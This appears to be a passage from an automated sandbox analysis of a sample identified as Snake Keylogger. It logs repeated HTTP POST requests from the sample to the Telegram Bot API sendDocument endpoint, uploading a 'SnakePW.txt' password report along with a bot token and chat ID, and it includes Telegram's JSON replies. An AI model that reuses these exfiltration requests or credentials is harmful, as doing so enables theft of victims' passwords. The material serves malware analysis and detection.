                                                                    2022-06-26 07:34:20 UTC400OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 31 32 34 36 39 64 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5757112469dbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:20 UTC401INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:20 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:20 UTC401INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67016,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228860,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    238192.168.2.550149149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:20 UTC401OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571162661f
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:20 UTC402OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 31 36 32 36 36 31 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571162661fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:21 UTC402INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:21 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 509
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:21 UTC403INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 31 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67018,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228861,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    239192.168.2.550150149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:21 UTC403OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571196da58
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:21 UTC403OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 31 39 36 64 61 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571196da58Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:21 UTC404INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:21 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:21 UTC404INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 31 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67019,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228861,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    24192.168.2.549792149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:48 UTC40OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756da20995d
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:48 UTC40OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 61 32 30 39 39 35 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756da20995dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:48 UTC41INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:48 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:48 UTC41INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 37 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66771,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228768,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    240192.168.2.550151149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:21 UTC405OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575711d4d6c1
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:21 UTC405OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 31 64 34 64 36 63 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575711d4d6c1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:21 UTC406INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:21 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:21 UTC406INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 32 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67020,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228861,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    241192.168.2.550152149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:22 UTC406OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575712094b6b
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:22 UTC407OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 32 30 39 34 62 36 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575712094b6bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:22 UTC407INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:22 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:22 UTC408INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67022,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228862,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    242192.168.2.550153149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:22 UTC408OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5757124748d1
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:22 UTC408OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 32 34 37 34 38 64 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5757124748d1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:22 UTC409INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:22 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:22 UTC409INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 32 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67023,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228862,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    243192.168.2.550154149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:22 UTC410OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575712854476
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
